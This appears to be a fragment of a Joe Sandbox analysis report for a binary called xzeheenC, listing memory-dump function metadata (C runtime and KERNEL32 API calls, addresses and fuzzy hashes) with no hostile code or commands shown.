                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3886058894-0
                                                                                                                        • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                        • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                        • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                        • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                        APIs
                                                                                                                        • EntryPoint.XZEHEENC(80070057), ref: 004017EE
                                                                                                                          • Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,21CD4C01,2C2D8410), ref: 0040101C
                                                                                                                          • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                                                        • EntryPoint.XZEHEENC(80070057), ref: 00401800
                                                                                                                        • EntryPoint.XZEHEENC(80070057), ref: 00401813
                                                                                                                        • __recalloc.LIBCMT ref: 00401828
                                                                                                                        • EntryPoint.XZEHEENC(8007000E), ref: 00401839
                                                                                                                        • EntryPoint.XZEHEENC(8007000E), ref: 00401853
                                                                                                                        • _calloc.LIBCMT ref: 00401861
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000426000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                        • Associated: 00000004.00000001.2234117095.0000000000441000.00000040.00000001.00020000.00000000.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_1_400000_xzeheenC.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1721462702-0
                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 00414744
                                                                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                        • __getptd.LIBCMT ref: 0041475B
                                                                                                                        • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                        • __lock.LIBCMT ref: 00414779
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                        • String ID: @.B
                                                                                                                        • API String ID: 3521780317-470711618
                                                                                                                        APIs
                                                                                                                        • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                        • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                        • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                        • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                        • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2805327698-0
                                                                                                                        APIs
                                                                                                                        • __getptd.LIBCMT ref: 00413FD8
                                                                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                        • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                        • __lock.LIBCMT ref: 00414008
                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                        • InterlockedIncrement.KERNEL32(00422910), ref: 00414050
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4271482742-0
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                        • API String ID: 1646373207-3105848591
                                                                                                                        APIs
                                                                                                                        • __fileno.LIBCMT ref: 0040C77C
                                                                                                                        • __locking.LIBCMT ref: 0040C791
                                                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2395185920-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: _fseek_malloc_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 208892515-0
                                                                                                                        APIs
                                                                                                                        • __flush.LIBCMT ref: 0040BB6E
                                                                                                                        • __fileno.LIBCMT ref: 0040BB8E
                                                                                                                        • __locking.LIBCMT ref: 0040BB95
                                                                                                                        • __flsbuf.LIBCMT ref: 0040BBC0
                                                                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3240763771-0
                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00415307
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3058430110-0
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000001.2234117095.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3016257755-0